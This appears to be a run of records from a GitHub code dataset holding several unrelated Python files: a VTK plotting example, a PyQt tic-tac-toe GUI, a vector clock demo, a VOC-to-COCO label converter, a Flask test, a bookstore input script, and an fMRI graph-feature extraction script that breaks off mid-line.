vtk.vtkPolyDataMapper()\nmapper.SetInput(normals.GetOutput())\nmapper.SetLookupTable(lut)\nmapper.SetScalarRange(extractScalarRange)\n\n# make the actor\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\n# add the actor to be rendered\nren.AddActor(actor)\n\n# set up text properties\ntextProp = vtk.vtkTextProperty()\ntextProp.SetFontFamilyToArial()\ntextProp.BoldOff()\ntextProp.ItalicOff()\ntextProp.ShadowOff()\ntextProp.SetColor(0.0, 0.0, 0.0)\n\n# make a title\ntitle = vtk.vtkTextMapper()\ntitle.SetInput(\"Example ellipsoid plot\")\n\n# make the title text use the text properties\ntitleProp = title.GetTextProperty()\ntitleProp.ShallowCopy(textProp)\ntitleProp.SetJustificationToCentered()\ntitleProp.SetVerticalJustificationToTop()\ntitleProp.SetFontSize(20)\ntitleProp.BoldOn()\n\n# make the actor for the title\ntitleActor = vtk.vtkTextActor()\ntitleActor.SetMapper(title)\ntitleActor.GetPositionCoordinate().SetCoordinateSystemToNormalizedDisplay()\ntitleActor.GetPositionCoordinate().SetValue(0.5, 0.95)\n\nren.AddActor(titleActor)\n\n# add a scalar bar\nscalarBar = vtk.vtkScalarBarActor()\nscalarBar.SetLookupTable(lut)\nscalarBar.SetWidth(0.1)\nscalarBar.SetHeight(0.8)\nscalarBar.SetPosition(0.9, 0.15)\n\n# set up the label text properties \nscalarBarTextProp = scalarBar.GetLabelTextProperty()\nscalarBarTextProp.ShallowCopy(textProp)\nscalarBarTextProp.SetFontSize(10)\n\nren.AddActor(scalarBar)\n\n# set up stuff for interactive viewing\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\niren.Initialize()\nrenWin.Render()\niren.Start()\n\n# the WindowToImageFilter is what one uses to save the window to an \n# image file\nwin2img = vtk.vtkWindowToImageFilter()\nwin2img.SetInput(renWin)\n\n# set up the PNGWriter as we're saving to png\nwriter = vtk.vtkPNGWriter()\nwriter.SetFileName(\"ellipsoidPlot.png\")\nwriter.SetInput(win2img.GetOutput())\nwriter.Write()\n\n# vim: expandtab shiftwidth=4:\n\n","repo_name":"paultcochrane/pyvisi","sub_path":"examples/renderers/vtk/ellipsoidPlot.py","file_name":"ellipsoidPlot.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"33921175502","text":"from PyQt6 import uic, QtWidgets\nfrom Form import Ui_Dialog\nfrom PyQt6.QtWidgets import QPushButton\nfrom TicTacToe import TicTacToe\nfrom Player import Player\nimport sys\n\nForm, Window = uic.loadUiType(\"form.ui\")\n\n\nclass Ui(QtWidgets.QDialog, Form):\n def __init__(self):\n super(Ui, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.initUI()\n\n def initUI(self):\n for btn in self.ui.groupBox.findChildren(QPushButton):\n btn.clicked.connect(self.buttonPresed)\n\n def buttonPresed(self):\n self.sender().setEnabled(False)\n btn = self.sender().objectName()\n temp = str(int(btn.split('_')[1]) - 1)\n s = '0' + temp if len(temp) == 1 else temp\n figure = game.add_position(int(s[0]), int(s[1]), player1)\n self.sender().setText(figure[0])\n self.end(figure[1])\n if type(figure[1]) is not tuple:\n self.draw()\n\n def draw(self):\n n, m = game.opponent_move()\n temp = game.add_position(n, m, player2)\n s = str(int(str(n) + str(m)) + 1)\n for pqbutton in self.ui.groupBox.findChildren(QPushButton):\n if pqbutton.objectName() == 'pushButton_' + s:\n pqbutton.setText(temp[0])\n pqbutton.setEnabled(False)\n self.end(temp[1])\n\n def end(self, res):\n if res == 'Ничья':\n return print(res)\n if res != 0:\n for i in range(len(res[1])):\n temp = str(int(str(res[1][i][0]) + 
str(res[1][i][1])) + 1)\n res[1][i] = 'pushButton_' + temp\n for pqbutton in self.ui.groupBox.findChildren(QPushButton):\n pqbutton.setEnabled(False)\n if pqbutton.objectName() in res[1]:\n font = pqbutton.font()\n font.setBold(True)\n font.setItalic(True)\n pqbutton.setFont(font)\n print(res[0])\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n w = Ui()\n w.show()\n player1 = Player('human', 'X')\n player2 = Player('computer', 'O')\n game = TicTacToe('hard', player1, player2)\n sys.exit(app.exec())\n","repo_name":"MrKykypy3ka/Y_lab","sub_path":"Week 2/Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"856448620","text":"from multiprocessing import Process, Pipe\n\ndef calc_recv_timestamp(recv_time_stamp, counter):\n #Take max of recieved and current value for each process\n result = [0 for i in range(len(counter))]\n for i in range(len(counter)):\n result[i] = max(recv_time_stamp[i], counter[i])\n return result\n\ndef event(pid, counter):\n # Increase counter of current pid\n counter[pid] += 1\n return counter\n\ndef send_message(pipe, pid, counter):\n # Increase counter of current pid and send counter\n counter[pid] += 1\n pipe.send(('Empty shell', counter))\n return counter\n\ndef recv_message(pipe, pid, counter):\n # increase counter of current pid, receive counter from other\n # process and call function to recalculate counter\n counter[pid] += 1\n message, timestamp = pipe.recv()\n counter = calc_recv_timestamp(timestamp, counter)\n return counter\n\ndef process_one(pipe12):\n pid = 0\n counter = [0,0,0]\n counter = send_message(pipe12, pid, counter)\n counter = send_message(pipe12, pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe12, pid, counter)\n counter = event(pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe12, pid, counter)\n\n print(\"Process\",str(pid), \":\", counter)\n\ndef process_two(pipe21, pipe23):\n pid = 1\n counter = [0,0,0]\n counter = recv_message(pipe21, pid, counter)\n counter = recv_message(pipe21, pid, counter)\n counter = send_message(pipe21, pid, counter)\n counter = recv_message(pipe23, pid, counter)\n counter = event(pid, counter)\n counter = send_message(pipe21, pid, counter)\n counter = send_message(pipe23, pid, counter)\n counter = send_message(pipe23, pid, counter)\n\n print(\"Process\", str(pid), \":\", counter)\n\ndef process_three(pipe32):\n pid = 2\n counter = [0,0,0]\n counter = send_message(pipe32, pid, counter)\n counter = recv_message(pipe32, pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe32, pid, counter)\n\n print(\"Process\", str(pid), \":\", counter)\n\nif __name__ == '__main__':\n oneandtwo, twoandone = Pipe()\n twoandthree, threeandtwo = Pipe()\n\n process1 = Process(target=process_one,\n args=(oneandtwo,))\n process2 = Process(target=process_two,\n args=(twoandone, twoandthree))\n process3 = Process(target=process_three,\n args=(threeandtwo,))\n\n process1.start()\n process2.start()\n process3.start()\n\n process1.join()\n process2.join()\n process3.join()","repo_name":"safinsaf/vector_clock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28995599899","text":"import xml.etree.ElementTree as ET\nimport os\nimport json\nfrom datetime import 
datetime\nimport sys\nimport argparse\n\ncoco = dict()\ncoco['images'] = []\ncoco['type'] = 'instances'\ncoco['annotations'] = []\ncoco['categories'] = []\n\ncategory_set = dict()\nimage_set = set()\n\ncategory_item_id = -1\nimage_id = 000000\nannotation_id = 0\n\n\ndef addCatItem(name):\n global category_item_id\n category_item = dict()\n category_item['supercategory'] = 'none'\n category_item_id += 1\n category_item['id'] = category_item_id\n category_item['name'] = name\n coco['categories'].append(category_item)\n category_set[name] = category_item_id\n return category_item_id\n\n\ndef addImgItem(file_name, size):\n global image_id\n if file_name is None:\n raise Exception('Could not find filename tag in xml file.')\n if size['width'] is None:\n raise Exception('Could not find width tag in xml file.')\n if size['height'] is None:\n raise Exception('Could not find height tag in xml file.')\n image_id += 1\n image_item = dict()\n image_item['id'] = image_id\n image_item['file_name'] = file_name\n image_item['width'] = size['width']\n image_item['height'] = size['height']\n image_item['license'] = None\n image_item['flickr_url'] = None\n image_item['coco_url'] = None\n image_item['date_captured'] = str(datetime.today())\n coco['images'].append(image_item)\n image_set.add(file_name)\n return image_id\n\n\ndef addAnnoItem(object_name, image_id, category_id, bbox):\n global annotation_id\n annotation_item = dict()\n annotation_item['segmentation'] = []\n seg = []\n # bbox[] is x,y,w,h\n # left_top\n seg.append(bbox[0])\n seg.append(bbox[1])\n # left_bottom\n seg.append(bbox[0])\n seg.append(bbox[1] + bbox[3])\n # right_bottom\n seg.append(bbox[0] + bbox[2])\n seg.append(bbox[1] + bbox[3])\n # right_top\n seg.append(bbox[0] + bbox[2])\n seg.append(bbox[1])\n\n annotation_item['segmentation'].append(seg)\n\n annotation_item['area'] = bbox[2] * bbox[3]\n annotation_item['iscrowd'] = 0\n annotation_item['ignore'] = 0\n annotation_item['image_id'] = image_id\n annotation_item['bbox'] = bbox\n annotation_item['category_id'] = category_id\n annotation_id += 1\n annotation_item['id'] = annotation_id\n coco['annotations'].append(annotation_item)\n\n\ndef read_image_ids(image_sets_file):\n ids = []\n with open(image_sets_file, 'r') as f:\n for line in f.readlines():\n ids.append(line.strip())\n return ids\n\n\ndef parseXmlFilse(data_dir, json_save_path, split='train'):\n assert os.path.exists(data_dir), \"data path:{} does not exist\".format(data_dir)\n labelfile = split + \".txt\"\n image_sets_file = os.path.join(data_dir, \"ImageSets\", \"Main\", labelfile)\n xml_files_list = []\n if os.path.isfile(image_sets_file):\n ids = read_image_ids(image_sets_file)\n xml_files_list = [os.path.join(data_dir, \"Annotations\", f\"{i}.xml\") for i in ids]\n elif os.path.isdir(data_dir):\n # 修改此处xml的路径即可\n # xml_dir = os.path.join(data_dir,\"labels/voc\")\n xml_dir = data_dir\n xml_list = os.listdir(xml_dir)\n xml_files_list = [os.path.join(xml_dir, i) for i in xml_list]\n\n for xml_file in xml_files_list:\n if not xml_file.endswith('.xml'):\n continue\n\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n # 初始化\n size = dict()\n size['width'] = None\n size['height'] = None\n\n if root.tag != 'annotation':\n raise Exception('pascal voc xml root element should be annotation, rather than {}'.format(root.tag))\n\n # 提取图片名字\n file_name = root.findtext('filename')\n assert file_name is not None, \"filename is not in the file\"\n\n # 提取图片 size {width,height,depth}\n size_info = root.findall('size')\n assert size_info 
is not None, \"size is not in the file\"\n for subelem in size_info[0]:\n size[subelem.tag] = int(subelem.text)\n\n if file_name is not None and size['width'] is not None and file_name not in image_set:\n # 添加coco['image'],返回当前图片ID\n current_image_id = addImgItem(file_name, size)\n print('add image with name: {}\\tand\\tsize: {}'.format(file_name, size))\n elif file_name in image_set:\n raise Exception('file_name duplicated')\n else:\n raise Exception(\"file name:{}\\t size:{}\".format(file_name, size))\n\n # 提取一张图片内所有目标object标注信息\n object_info = root.findall('object')\n if len(object_info) == 0:\n continue\n # 遍历每个目标的标注信息\n for object in object_info:\n # 提取目标名字\n object_name = object.findtext('name')\n if object_name not in category_set:\n # 创建类别索引\n current_category_id = addCatItem(object_name)\n else:\n current_category_id = category_set[object_name]\n\n # 初始化标签列表\n bndbox = dict()\n bndbox['xmin'] = None\n bndbox['xmax'] = None\n bndbox['ymin'] = None\n bndbox['ymax'] = None\n # 提取box:[xmin,ymin,xmax,ymax]\n bndbox_info = object.findall('bndbox')\n for box in bndbox_info[0]:\n bndbox[box.tag] = int(box.text)\n\n if bndbox['xmin'] is not None:\n if object_name is None:\n raise Exception('xml structure broken at bndbox tag')\n if current_image_id is None:\n raise Exception('xml structure broken at bndbox tag')\n if current_category_id is None:\n raise Exception('xml structure broken at bndbox tag')\n bbox = []\n # x\n bbox.append(bndbox['xmin'])\n # y\n bbox.append(bndbox['ymin'])\n # w\n bbox.append(bndbox['xmax'] - bndbox['xmin'])\n # h\n bbox.append(bndbox['ymax'] - bndbox['ymin'])\n print('add annotation with object_name:{}\\timage_id:{}\\tcat_id:{}\\tbbox:{}'.format(object_name,\n current_image_id,\n current_category_id,\n bbox))\n addAnnoItem(object_name, current_image_id, current_category_id, bbox)\n\n json_parent_dir = os.path.dirname(json_save_path)\n if not os.path.exists(json_parent_dir):\n os.makedirs(json_parent_dir)\n json.dump(coco, open(json_save_path, 'w'))\n print(\"class nums:{}\".format(len(coco['categories'])))\n print(\"image nums:{}\".format(len(coco['images'])))\n print(\"bbox nums:{}\".format(len(coco['annotations'])))\n\n\nif __name__ == '__main__':\n \"\"\"\n 脚本说明:\n 本脚本用于将VOC��式的标注文件.xml转换为coco格式的标注文件.json\n 参数说明:\n voc_data_dir:两种格式\n 1.voc2012文件夹的路径,会自动找到voc2012/imageSets/Main/xx.txt\n 2.xml标签文件存放的文件夹\n json_save_path:json文件输出的文件夹\n split:主要用于voc2012查找xx.txt,如train.txt.如果用格式2,则不会用到该参数\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--voc-dir', type=str, default='data/label/voc', help='voc path')\n parser.add_argument('-s', '--save-path', type=str, default='./data/convert/coco/train.json', help='json save path')\n parser.add_argument('-t', '--type', type=str, default='train', help='only use in voc2012/2007')\n opt = parser.parse_args()\n if len(sys.argv) > 1:\n print(opt)\n parseXmlFilse(opt.voc_dir, opt.save_path, opt.type)\n else:\n # voc_data_dir = r'D:\\dataset\\VOC2012\\VOCdevkit\\VOC2012'\n voc_data_dir = './data/labels/voc'\n json_save_path = './data/convert/coco/train.json'\n split = 'train'\n parseXmlFilse(data_dir=voc_data_dir, json_save_path=json_save_path, split=split)\n","repo_name":"KKKSQJ/DeepLearning","sub_path":"others/label_convert/voc2coco.py","file_name":"voc2coco.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"44"} +{"seq_id":"8524482009","text":"from flask import json\nfrom src.models.user import User\nfrom 
src.messages.success import success_msg\n\nBASE_URL = '/api/v1'\nCHARSET = 'utf-8'\n\n\nclass TestLandingPage:\n def test_base_url_successful(\n self,\n client,\n ):\n response = client.get('/')\n json_response = json.loads(response.data.decode(CHARSET))\n assert response.status_code == 200\n assert json_response['message'] == success_msg['landing_page']\n assert json_response['status'] == 'success'\n","repo_name":"nzediegwu1/taskmanager-api","sub_path":"tests/endpoints/test_landing_page.py","file_name":"test_landing_page.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5523321458","text":"\"\"\"\nO nosso cliente solicitou uma tabela para armazenar os livros que são comercializados pela\nempresa. A solicitação é somente para livros e não há a necessidade de realizar busca em\noutras tabelas. Hoje há um funcionário de vendas que tem uma tabela do Excel para guardar\nesses registros, mas as buscas estão ficando complexas. Decidiu-se então criar um banco de\ndados separado para esse funcionário.\nApós a criação da tabela, deveremos entregar algumas queries prontas para que sejam\nenviadas para o programador. As queries são as seguintes:\n1 – Trazer todos os dados.\n2 – Trazer o nome do livro e o nome da editora\n3 – Trazer o nome do livro e a UF dos livros publicados por autores do sexo masculino.\n4 - Trazer o nome do livro e o número de páginas dos livros publicados por autores do sexo\nfeminino.\n5 – Trazer os valores dos livros das editoras de São Paulo.\n6 – Trazer os dados dos autores do sexo masculino que tiveram livros publicados por São\nPaulo ou Rio de Janeiro (Questão Desafio).\n\nBanco:\tLIVRARIA\nTabela:\tLIVROS\nAtributos:\nNOME DO LIVRO\nNOME DO AUTOR\nSEXO DO AUTOR\nNUMERO DE PÁGINAS\nNOME DA EDITORA\nVALOR DO LIVRO\nESTADO (UF) DA EDITORA\nANO PUBLICACAO\n\"\"\"\nfrom tkinter import *\n\nbook = None\ngender = None\npages_number = None\neditor_name = None\nbook_value = None\neditor_uf = None\nyear_publication = None\nautor_name = None\nbook_store = []\n\n\ndef run():\n global book, gender, editor_name, editor_uf, book_store, autor_name\n autor_name = input(\"author's name: \")\n book = {autor_name: input(\"Book : \")}\n gender = {\"Gender\": input(\"Mas (M) or Fam (F): \")}\n editor_name = {\"Editor name\": input(\"Editorś name: \")}\n editor_uf = {\"Editor UF:\": input(\"Editor's UF: \")}\n\n read_pages()\n read_bookvalue()\n read_year_publication()\n\n store = [book, gender, pages_number, editor_name, book_value, editor_uf, year_publication]\n book_store.extend(store)\n\n again()\n\n\ndef read_pages():\n global pages_number\n try:\n pages_number = {\"Number of pages\": int(input(\"Input Number of pages: \"))}\n return pages_number\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_pages()\n\n\ndef read_bookvalue():\n global book_value\n try:\n book_value = {\"Book Value\": int(input(\"Book Value: \"))}\n return book_value\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_bookvalue()\n\n\ndef read_year_publication():\n global year_publication\n try:\n year_publication = {\"Year of Publication\": int(input(\"Year of Publication: \"))}\n return year_publication\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_bookvalue()\n\n\ndef again():\n yes = \"yes\"\n no = 'no'\n res = input(\"do you want to do it again? 
\")\n if res == yes:\n run()\n else:\n print(\"Good Bye\")\n return\n\n\nrun()\n\nprint(book_store)\n\n","repo_name":"rafalacerda1530/Python","sub_path":"atividades/Atividades_de_treino/Atividade Livraria.py","file_name":"Atividade Livraria.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31923385135","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 1 09:52:17 2020\r\n\r\n@author: mmousa4\r\n\"\"\"\r\n##referenec: https://brainiak.org/events/ohbm2018/brainiak_sample_tutorials/09-fcma.html#connectome\r\n##reference: https://brainiak.org/events/ohbm2018/brainiak_sample_tutorials/09-fcma.html#connectome\r\n\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport networkx as nx\r\n\r\ndef CreateGraph(edges):\r\n# edges = correlations_ICA[i,:,:]\r\n G = nx.Graph()\r\n #, coords_connectome\r\n epoch_corr = edges\r\n # What is the (absolute) correlation threshold\r\n threshold = 0.129\r\n \r\n nodelist = []\r\n edgelist = []\r\n \r\n #Normalized [0,1]\r\n edges = (edges-np.min(edges))/(np.max(edges)-np.min(edges))\r\n \r\n \r\n for row_counter in range(epoch_corr.shape[0]):\r\n nodelist.append(str(row_counter)) # Set up the node names\r\n \r\n for col_counter in range(epoch_corr.shape[1]):\r\n \r\n # Determine whether to include the edge based on whether it exceeds the threshold\r\n if abs(epoch_corr[row_counter, col_counter]) > threshold:\r\n # Add a tuple specifying the voxel pairs being compared and the weight of the edge\r\n edgelist.append((str(row_counter), str(col_counter), {'weight': epoch_corr[row_counter, col_counter]}))#1}))#\r\n #weight = 1: for binary Graph , binarized, undirected graph\r\n # Create the nodes in the graph\r\n G.add_nodes_from(nodelist)\r\n \r\n # Add the edges\r\n G.add_edges_from(edgelist)\r\n \r\n #remove self loops \r\n G.remove_edges_from(nx.selfloop_edges(G))\r\n# print (edgelist)\r\n# nx.draw(G)\r\n return G\r\n\r\n\r\n\r\n#%%\r\n#reference: https://whitakerlab.github.io/scona/_modules/scona/graph_measures.html\r\ndef calc_nodal_partition(G):\r\n '''\r\n Calculate a nodal partition of G using the louvain algorithm as\r\n iBrainNetworkommunity.best_partition`\r\n\r\n Note that this is a time intensive process and it is also\r\n non-deterministic, so for consistency and speed it's best\r\n to hold on to your partition.\r\n\r\n Parameters\r\n ----------\r\n G : :class:`networkx.Graph`\r\n A binary graph\r\n\r\n Returns\r\n -------\r\n (dict, dict)\r\n Two dictionaries represent the resulting nodal partition of G. 
The\r\n first maps nodes to modules and the second maps modules to nodes.\r\n '''\r\n import community\r\n # Make sure the edges are binarized\r\n for u, v, d in G.edges(data=True):\r\n if d.get('weight', 1) != 1:\r\n raise ValueError(\"G should be a binary graph\")\r\n # Now calculate the best partition\r\n nodal_partition = community.best_partition(G)\r\n\r\n # Reverse the dictionary to record a list of nodes per module, rather than\r\n # module per node\r\n module_partition = {}\r\n for n, m in nodal_partition.items():\r\n try:\r\n module_partition[m].append(n)\r\n except KeyError:\r\n module_partition[m] = [n]\r\n\r\n return nodal_partition, module_partition\r\n\r\n\r\n \r\ndef participation_coefficient(graph, partition):\r\n \"\"\"\r\n Computes the participation coefficient for each node.\r\n\r\n ------\r\n Inputs\r\n ------\r\n graph = networkx graph\r\n partition = modularity partition of graph\r\n\r\n ------\r\n Output\r\n ------\r\n List of the participation coefficient for each node.\r\n\r\n \"\"\"\r\n# graph, partition = graph,module_partition\r\n pc_dict = {}\r\n all_nodes = set(graph.nodes())\r\n paths = dict(nx.shortest_path_length(G=graph))\r\n for m in partition.keys():\r\n mod_list = set(partition[m])\r\n between_mod_list = list(set.difference(all_nodes, mod_list))\r\n for source in mod_list:\r\n degree = float(nx.degree(G=graph, nbunch=source))\r\n count = 0\r\n for target in between_mod_list:\r\n if source in paths and target in paths[source] and paths[source][target] == 1:\r\n count += 1\r\n bm_degree = count\r\n pc = 1 - (bm_degree / degree) ** 2 if degree !=0 else 0\r\n pc_dict[source] = pc\r\n return pc_dict\r\n\r\n#%%\r\n#10 local and 13 global graph measures were\r\n#calculated based on rs-fMRI adjacency matrix. The local graph\r\n#measures were betweenness centrality, clustering coefficient,\r\n#characteristic path, community structure Newman (CSN), community\r\n#structure Louvain (CSL), eigenvector centrality, rich club\r\n#coefficient, sub graph centrality, eccentricity,and participation coefficient?\r\n#(45). 
\r\n#The average shortest path length between all pairs of nodes in thenetwork is known as thecharacteristic path lengthof the network(e.g.,Watts and Strogatz, 1998) \r\n#The node eccentricity is the maximal shortest path length between a node and any other node\r\n \r\nfrom networkx import algorithms\r\nfrom community import community_louvain\r\nfrom community import best_partition #conda install -c conda-forge python-louvain (amaconda prompt)\r\nfrom networkx.algorithms.shortest_paths.unweighted import all_pairs_shortest_path_length\r\nfrom networkx.algorithms.distance_measures import eccentricity\r\n\r\n#reference: 2017_wang et al _Depression Disorder Classification of fMRI Data Using Sparse.pdf\r\n# In this paper, eight graph-based features are computed from the following four aspects:\r\n# functional segregation (Clustering coefficient,Local efficiency), \r\n# functional integration (Characteristic path length, global efficiency ), \r\n# nodal centrality (Degree and betweenness centrality), and \r\n# network resilience\r\ndef feature_vector2(G):\r\n # 4 local + 3 Global\r\n# G=graph\r\n featureVector=[]\r\n \r\n #functional segregation (Clustering coefficient,Local efficiency)\r\n #-----------------------------------\r\n #Clustering coefficient\r\n glm_l_clusteringCoefficient= nx.clustering(G)\r\n \r\n #Local efficiency\r\n glm_g_local_efficiency = nx.algorithms.efficiency_measures.local_efficiency(G)\r\n \r\n #functional integration (Characteristic path length, global efficiency )\r\n #----------------------------------\r\n #Characteristic path length\r\n if nx.is_connected(G):\r\n glm_g_characteristicPath= nx.average_shortest_path_length(G)\r\n else:\r\n glm_g_characteristicPath = 0\r\n \r\n #global efficiency\r\n glm_g_global_efficiency = nx.global_efficiency(G)\r\n \r\n \r\n #Nodal centrality (Degree and betweenness centrality)\r\n #----------------------------------\r\n #Degree\r\n glm_l_degree = G.degree\r\n degreelist = [d for n, d in G.degree()]\r\n glm_l_degree = dict(zip(range(0,len(degreelist)), degreelist)) \r\n #Betweenness centrality\r\n glm_l_betweennessCentrality=nx.betweenness_centrality(G,normalized=True)\r\n \r\n #Participation coefficient\r\n nodal_partition, module_partition= calc_nodal_partition(G)\r\n glm_l_pp =participation_coefficient (G,module_partition)\r\n #Network Resilience\r\n #-----------------------------------\r\n glm_l_average_neighbor_degree = nx.average_neighbor_degree(G)\r\n \r\n #Once we have obtained all the eight graph-based features, we concatenate them to construct the final feature vectors.\r\n #Specifically, for each subject, the feature vector has a size of 698, which consists of 116 ∗ 6 local measures and 2 global ones.\r\n featureVector=list(glm_l_clusteringCoefficient.values())\r\n# featureVector = featureVector + list(glm_l_local_efficiency)\r\n featureVector = featureVector + list(glm_l_degree.values())\r\n featureVector = featureVector + list(glm_l_betweennessCentrality.values())\r\n featureVector = featureVector + list(glm_l_average_neighbor_degree.values())\r\n featureVector = featureVector + list(glm_l_pp.values())\r\n \r\n featureVector.append(glm_g_characteristicPath if nx.is_connected(G) else 0)\r\n featureVector.append(glm_g_global_efficiency)\r\n featureVector.append(glm_g_local_efficiency)\r\n \r\n# fv_columns = []\r\n fv_columns = [str(x) + 'clusteringCoefficient' for x in list(glm_l_clusteringCoefficient.keys())] \r\n# fv_columns = fv_columns + [str(x) + 'local_efficiency' for x in list(glm_l_local_efficiency.keys())] \r\n 
fv_columns = fv_columns + [str(x) + 'nodeDegree' for x in list(glm_l_degree.keys())]\r\n fv_columns= fv_columns +[str(x) + 'betweennessCentrality' for x in list(glm_l_betweennessCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'average_neighbor_degree' for x in list(glm_l_average_neighbor_degree.keys())]\r\n fv_columns = fv_columns + [str(x) + 'participation_coefficient' for x in list(glm_l_pp.keys())]\r\n \r\n fv_columns = fv_columns + ['characteristicPath','global_efficiency','local_efficiency']\r\n print(\"featureVector.length:\",featureVector.count)\r\n print(fv_columns)\r\n return featureVector , fv_columns\r\n \r\ndef feature_vector(G):\r\n #6 local and 8 global graph measures were computed that resultedin 913 features\r\n# G=graph\r\n featureVector=[]\r\n #Local measures\r\n #--------------\r\n glm_l_betweennessCentrality=nx.betweenness_centrality(G) #1.betweenness centrality (defined as the fraction of all shortest paths in the network that pass through a given node.)\r\n glm_l_clusteringCoefficient= nx.clustering(G)#2.clustering coefficient(cc)\r\n# glm_l_characteristicPath = dict(nx.all_pairs_shortest_path_length(G)) #3.characteristic path\r\n #3. The average shortest path length between all pairs of nodes in the network is known as the characteristic path length of the network\r\n glm_l_csn = nx.algorithms.community.girvan_newman(G) #4.community structure Newman (CSN)\r\n glm_l_csn = tuple(sorted(c) for c in next(glm_l_csn))\r\n #glm_l_csl =community_louvain.best_partition(G) #5.community structure Louvain (CSL) # use community of 'python-louvain' vs 'networkx.algorithms.community' \r\n glm_l_evcentrality = nx.eigenvector_centrality(G) #6.eigenvector centrality\r\n glm_l_richClubCoef = nx.rich_club_coefficient(G, normalized=False)#7.rich_club_coefficient is not implemented for graphs with self loops.\r\n glm_l_subGraphCentrality = nx.algorithms.centrality.subgraph_centrality(G) #8.sub graph centrality\r\n if nx.is_connected(G):\r\n glm_l_eccentricity = eccentricity(G) #9.eccentricity\r\n glm_g_characteristicPath= float(nx.average_shortest_path_length(G))#3.characteristic path\r\n glm_g_diameter = nx.diameter(G)#9.graph diameter\r\n glm_g_smallworld_sigma = nx.algorithms.smallworld.sigma(G)#11.small-worldness\r\n\r\n \r\n #The global graph measures were assortativity, clustering\r\n #coefficient, characteristic path, community structure Newman\r\n #output, community structure Louvain output, cost efficiency\r\n #(two measures), density, efficiency, graph radius, graph diameter,\r\n #transitivity, and small-worldness (45).\r\n #The global efficiency is the average inverse shortest path length in the network\r\n #The global cost efficiency is then defined as the global efficiency at a given cost minus the cost,i.e.,(E\tC),which will typically have a maximum value max(E\tC)\u00040,atsomecostCmax,foraneconomicalsmall-worldnetwork.Likewise,the regionalcostefficiencywascalculatedasthemaximumofthefunction(E(i)\tk),wherekisthedegreeornumberofedgesconnectingtheith\r\n #Global measures\r\n #--------------\r\n# glm_g_degree_assortativity_coef = nx.algorithms.assortativity.degree_assortativity_coefficient(G) # 1.assortativity\r\n glm_g_clusteringCoefficient=nx.average_clustering(G) #2.Global Clustering Coefficient (CC)\r\n #4.community structure Newman output\r\n #5.community structure Louvain output\r\n# glm_g_globalCostEfficiency = glm_g_global_efficiency - #6.cost efficiency(two measures)\r\n #GCE=E - PSW, Where Ei is the efficiency of node i, N is the set of all nodes in the 
network, n is the number of nodes and di j is the shortest path length (distance) between nodes i and j\r\n glm_g_density = nx.density(G)#7.density\r\n glm_g_global_efficiency = nx.global_efficiency(G)#8.efficiency \r\n \r\n glm_g_transitivity= nx.transitivity(G)#10.transitivity\r\n glm_g_radius = nx.radius(G)#12.graph radius\r\n\r\n \r\n featureVector=list(glm_l_betweennessCentrality.values())\r\n featureVector = featureVector + list(glm_l_clusteringCoefficient.values())\r\n# featureVector = featureVector + list(glm_l_characteristicPath.values())\r\n featureVector = featureVector + list(glm_l_evcentrality.values())\r\n featureVector = featureVector + list(glm_l_richClubCoef.values())\r\n featureVector = featureVector + list(glm_l_subGraphCentrality.values())\r\n featureVector = featureVector + list(glm_l_eccentricity.values())\r\n \r\n# featureVector.append(glm_g_degree_assortativity_coef)\r\n featureVector.append(glm_g_clusteringCoefficient)\r\n featureVector.append(glm_g_characteristicPath)\r\n featureVector.append(glm_g_density)\r\n featureVector.append(glm_g_global_efficiency)\r\n featureVector.append(glm_g_diameter)\r\n featureVector.append(glm_g_transitivity)\r\n featureVector.append(glm_g_smallworld_sigma)\r\n featureVector.append(glm_g_radius)\r\n \r\n \r\n# fv_columns = []\r\n fv_columns= [str(x) + 'betweennessCentrality' for x in list(glm_l_betweennessCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'clusteringCoefficient' for x in list(glm_l_clusteringCoefficient.keys())] \r\n# fv_columns = fv_columns + list(glm_l_characteristicPath.values())\r\n fv_columns = fv_columns + [str(x) + 'evcentrality' for x in list(glm_l_evcentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'richClubCoef' for x in list(glm_l_richClubCoef.keys())] \r\n fv_columns = fv_columns + [str(x) + 'subGraphCentrality' for x in list(glm_l_subGraphCentrality.keys())] \r\n fv_columns = fv_columns + [str(x) + 'eccentricity' for x in list(glm_l_eccentricity.keys())] \r\n fv_columns = fv_columns + ['clusteringCoefficient','characteristicPath','density','global_efficiency','diameter','transitivity','smallworld','radius']\r\n print(\"featureVector.length:\",featureVector.count)\r\n print(fv_columns)\r\n return featureVector , fv_columns#'degree_assortativity_coef',\r\n#%%\r\nimport os \r\n\r\n#np.load.__defaults__=(None, False, True, 'ASCII')\r\nnp_load_old = np.load\r\nnp.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, 